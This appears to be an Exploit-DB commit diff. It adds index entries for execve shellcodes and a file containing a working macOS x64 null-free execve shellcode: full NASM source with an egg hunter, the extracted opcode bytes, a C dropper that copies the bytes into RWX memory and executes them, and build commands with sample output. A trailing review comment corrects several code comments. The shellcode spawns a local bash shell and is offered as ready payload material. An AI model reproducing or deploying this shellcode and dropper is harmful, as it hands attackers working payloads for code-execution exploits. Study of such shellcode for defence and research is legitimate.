834 51177 shellcodes/macos/51177.txt macOS/x64 - Execve Null-Free Shellcode 2023-03-31 boku macos 253 2023-03-31 2023-03-31 0
835 39885 shellcodes/multiple/39885.c BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator) 2016-06-06 odzhancode multiple 194 2016-06-16 2018-01-21 1 http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png
836 13469 shellcodes/multiple/13469.c BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes) 2004-09-12 dymitri multiple 38 2004-09-11 1
837 13465 shellcodes/multiple/13465.c Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes) 2005-11-15 Charles Stevenson multiple 99 2005-11-14 1

216
shellcodes/macos/51177.txt Normal file

@ -0,0 +1,216 @@
# Shellcode Title: macOS/x64 - Execve Null-Free Shellcode (253 Bytes)
# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
# Date: 12/20/2022
# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
# Shellcode Description:
# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is within the shellcode. The shellcode finds the string in memory, copies the string to the stack, and then changes the string terminator to 0x00.
# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
# Compile & run:
# nasm -f macho64 execve.asm -o execve
# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
# # Add shellcode to dropper.c
# gcc dropper.c -o dropper
# sh-3.2$ pstree -p $(echo $$) | grep $$
# \-+= 56862 bobby sh
# sh-3.2$ ./dropper
# [+] Shellcode Length: 253 Bytes
# [+] Copying shellcode from variable at 0x10e4fde00 to allocated RWX memory at 0x10e643000
# [+] Executing shellcode at 0x10e643000
# bobby$ pstree -p $(echo $$) | grep -B1 $$
# \-+= 56862 bobby sh
# \-+= 57021 bobby (bash)
bits 64
global _main
_main:
create_stackframe:
push rbp ; push current base pointer to the stack
mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
sub rsp, 0x60 ; create space for string
mov [rbp-0x8], rsp ; Save destination string buffer address
jmp short lilypad_1
; char * string eggHunter(egg);
; RAX RDI
; description: starts searching for the supplied egg starting from the callers return address
eggHunter:
mov rcx, [rsp] ; start the egghunter from the caller function return address
hunt:
inc rcx ; move to the hunter to the next byte
cmp [rcx], di ; did we find the first egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; move hunter to 2nd egg location
cmp [rcx], di ; did we find the second egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
xchg rax, rcx ; return start of string address
ret
; int length strsize(&string, terminator);
; RAX RDI RSI
; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
strsize:
xor rax, rax ; clear register
xor rcx, rcx ; set the counter to zero
strsize_loop:
mov rcx, rdi ; start of string address
add rcx, rax ; current memory location of char in string
cmp [rcx], sil ; is this the null terminator?
je strsize_return
prevent_infinite_loop:
cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
jg strsize_fail2find ; if value in RAX is greater, jump to label
inc rax ; move to the next char in the string
jmp strsize_loop
strsize_fail2find:
xor rax, rax ; return null/ 0x0
strsize_return:
ret
lilypad_1:
jmp short lilypad_2
; char * string terminateString(&string, terminator);
; RAX RDI RSI
; description: Finds the string terminator and changes it to a null byte
terminateString:
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start address to look for terminator
loop_find_terminator:
cmp [rcx], sil ; is this the null terminator?
je found_terminator
inc rcx ; move to the next char in the string
jmp loop_find_terminator
found_terminator:
mov [rcx], al
ret
; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
; RAX RDI RSI RDX
; description: Move memory from source address to destination address
; ARG1 - RDI: destination address
; ARG2 - RSI: source address
; ARG3 - RDX: size of the memory
move_memory:
; Loop through memory and move each byte from source to destination
push rdi ; save the destination address so we can return it at the end
xor rax, rax ; register to temporarily hold the byte we are copying
move_memory_loop:
mov al, [rsi] ; read the byte from source address into the temporary register
mov [rdi], al ; write the byte at the destination address
inc rsi ; increment source address
inc rdi ; increment destination address
dec rdx ; decrement memory size
jnz move_memory_loop ; repeat loop until memory size is 0
; Return to caller
pop rax ; return the destination address of the memory to the caller
ret
lilypad_2:
jmp short lilypad_3
; void clear_memory(void *dst_addr, size_t mem_size);
; RDI RSI
; description: Writes 0x00 bytes to a destination address
; ARG1 - RDI: a pointer to the destination address
; ARG2 - RSI: the size of the memory to be written to
clear_memory:
mov rcx, rsi ; load memory size from second argument into rcx
xor rax, rax
; Loop through memory and write 0x00 to each byte in destination address
clrmem_loop:
mov byte [rdi], al ; write 0x00 to byte in destination address
inc rdi ; increment destination address
dec rcx ; decrement memory size
jnz clrmem_loop ; repeat loop until memory size is 0
; Return to caller
ret
lilypad_3:
; *string = eggHunter(egg); Starts hunt from return address of caller
find_execve_string:
xor rdi, rdi ; clear register
mov di, 0xBCB0 ; Arg 1: Our egg
call eggHunter ; returns string start address
mov [rbp-0x10], rax ; Save string address
get_strlen:
mov rdi, [rbp-0x10] ; Arg 1: string start address
xor rsi, rsi ; clear register
mov sil, 0xFF ; Arg 2: string terminator
call strsize ; returns string size
mov [rbp-0x18], rax ; Save string size
; move_memory(dst_addr, src_addr, mem_size);
; RDI RSI RDX
copy_str2stack:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
mov rsi, [rbp-0x10] ; Arg 2: Original string location
mov rdx, [rbp-0x18] ; Arg 3: size
call move_memory
do_terminate_string:
mov rdx, [rbp-0x18] ; string size
mov rdi, [rbp-0x8] ; String buffer on stack
add rdi, rdx ; Arg 1: string terminator location
xor rsi, rsi ; clear register
mov sil, 0x1 ; Arg 2: mem size to null
call clear_memory ; returns string size
; execve("/bin/bash",NULL,NULL)
execve:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
xor rsi, rsi ; Arg 2: NULL
xor rdx, rdx ; Arg 3: NULL
xor rax, rax ; clear register for syscall number setup
mov al, 0x2 ; set a bit in register
ror rax, 0x28 ; move the bit over 28 bits to the right in the register
mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
syscall ; do syscall interrupt
fixstack:
add rsp, 0x60 ; clear allocated stack space
pop rbp ; restore stack base pointer
ret ; return to caller
shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"/bin/bash",0xFF
###########################################################################################################################################
// dropper.c
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*execute_shellcode)();
const unsigned char shellcode[] =
"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff";
int main() {
size_t shellcode_size = sizeof(shellcode);
printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);
void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (rwx_memory == MAP_FAILED) {
printf("[!] Failed to allocate RWX memory\n");
perror("mmap");
exit(-1);
}
printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);
memcpy(rwx_memory, shellcode, sizeof(shellcode));
execute_shellcode = rwx_memory;
printf("[+] Executing shellcode at %p\n",rwx_memory);
execute_shellcode();
return 0;
}
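Review bot: The comment on `ror rax, 0x28` in the `execve:` block says the bit moves "28 bits", but the operand is hexadecimal, so the rotate is by 40 bits and turns 0x2 into 0x2000000 before `mov al, 0x3b` fills in the call number. Anyone checking the syscall value against the comment will arrive at the wrong constant. I would write it as `ror rax, 0x28 ; rotate right 0x28 (40) bits: 0x2 -> 0x2000000, the BSD syscall class bits on macOS x86_64`. Two other comments disagree with the code: `call clear_memory ; returns string size` contradicts the `void clear_memory(...)` header above that routine, and `terminateString` is documented as a helper although nothing in the listing calls it, so it should be marked as unused. In dropper.c, the `printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size)` call passes a `size_t` and should use `%zu`.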